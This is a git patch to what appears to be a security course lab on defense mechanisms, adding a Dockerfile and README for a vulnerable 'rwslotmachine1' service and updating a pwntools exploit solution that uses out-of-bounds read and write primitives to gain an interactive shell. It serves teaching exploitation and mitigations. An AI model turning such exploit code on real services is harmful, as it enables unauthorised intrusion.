From 4d1f4b3b9bc087d9021e7e6ab397c3b216b155c5 Mon Sep 17 00:00:00 2001 From: ClaraStefania Date: Wed, 11 Dec 2024 23:34:28 +0200 Subject: [PATCH] Add Dockerfile for chapters/mitigations-and-defensive-strategies, 01-rwslotmachine1 Signed-off-by: ClaraStefania --- .../01-rwslotmachine1/sol/Dockerfile | 21 +++++++++++++ .../01-rwslotmachine1/sol/README.md | 12 ++++++++ .../01-rwslotmachine1/sol/sol_no_nx.py | 30 ++++++++++--------- 3 files changed, 49 insertions(+), 14 deletions(-) create mode 100644 chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/01-rwslotmachine1/sol/Dockerfile create mode 100644 chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/01-rwslotmachine1/sol/README.md diff --git a/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/01-rwslotmachine1/sol/Dockerfile b/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/01-rwslotmachine1/sol/Dockerfile new file mode 100644 index 0000000..1af10bb --- /dev/null +++ b/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/01-rwslotmachine1/sol/Dockerfile @@ -0,0 +1,21 @@ +# Stage 1: Build Stage +FROM gcc:latest AS build + +WORKDIR /app + +COPY rwslotmachine1.c . + +# Compile the C code into an executable +RUN gcc -Wall -Wextra -O2 -o rwslotmachine1 rwslotmachine1.c + +# Stage 2: Runtime Stage +FROM ubuntu:latest + +WORKDIR /app + +COPY --from=build /app/rwslotmachine1 /app/rwslotmachine1 + +EXPOSE 31344 + +# Run the application +CMD ["./rwslotmachine1"] diff --git a/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/01-rwslotmachine1/sol/README.md b/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/01-rwslotmachine1/sol/README.md new file mode 100644 index 0000000..6329164 --- /dev/null +++ b/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/01-rwslotmachine1/sol/README.md @@ -0,0 +1,12 @@ +## Building and running + +1. Build the Dockerfile +```bash +docker build -t ransomware1 . +``` + +2. Run the Dockerfile +```bash +docker run -it -p 31344:31344 ransomware1 +``` + diff --git a/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/01-rwslotmachine1/sol/sol_no_nx.py b/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/01-rwslotmachine1/sol/sol_no_nx.py index 40d3c52..e2eab64 100644 --- a/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/01-rwslotmachine1/sol/sol_no_nx.py +++ b/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/01-rwslotmachine1/sol/sol_no_nx.py @@ -1,6 +1,6 @@ from pwn import * -local = False +local = True # Both solutions work against the Docker container instance. # Only solution 2 works locally. # Solution 1 fails on the local machine because there is no valid address at that index. @@ -13,21 +13,23 @@ def do_read(idx): - p.recvuntil(">") - p.sendline("1") - p.recvuntil("index:") - p.sendline(str(idx)) - p.recvuntil("]: ") - return int(p.recvuntil("\n")[:-1], 16) + p.recvuntil(b">") + p.sendline(b"1") + p.recvuntil(b"index:") + p.sendline(str(idx).encode()) + p.recvuntil(b"]: ") + leak = p.recvline().strip() + print(f"Raw Leak: {leak}") + return int(leak, 16) def do_write(idx, value): - p.recvuntil(">") - p.sendline("2") - p.recvuntil("index:") - p.sendline(str(idx)) - p.recvuntil("value:") - p.sendline(hex(value)) + p.recvuntil(b">") + p.sendline(b"2") + p.recvuntil(b"index:") + p.sendline(str(idx).encode()) + p.recvuntil(b"value:") + p.sendline(hex(value).encode()) if SOLUTION == 1: @@ -45,4 +47,4 @@ def do_write(idx, value): do_write(-8, stack_slots) -p.interactive() +p.interactive() \ No newline at end of file